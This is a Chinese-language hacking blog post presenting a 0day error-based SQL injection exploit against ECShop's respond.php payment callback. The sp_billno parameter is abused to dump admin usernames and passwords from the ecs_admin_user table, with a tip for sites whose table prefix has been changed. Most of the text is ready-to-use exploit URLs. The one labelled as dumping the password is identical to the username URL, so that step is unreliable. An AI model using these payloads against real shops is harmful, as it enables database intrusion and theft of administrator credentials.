ECshop 支付方式0day手工注射 EXP

图文：黑白过客

主题：ECshop 支付方式0day手工注射的研究

原EXP为：

respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select

(select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `ecs`.ecs_admin_user)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

and 1=1
 

漏洞具体见：http://www.hackline.net/a/news/ldfb/web/2011/0105/7877.html

一直无法手工注入得到用户与密码。

经过牛人的指点后，我成功得到的返回用户和密码字段的exp

暴用户名：

http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20user_name%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
 

暴密码：

http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20user_name%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
 

如果表前缀被改如下所示：

MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT log_id FROM `aimeili`.`aml_pay_log` WHERE order_id=1 and(select 1 from(select count(*),concat((select (select (SELECT password FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 AND order_type=1 ) [2] => Array ( [error] => Table 'aimeili.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )
 

只要修改ecs_admin_user为aml_admin_user即可

有图有真像
 

最后感谢神牛Luc1f3r
 

标签分类：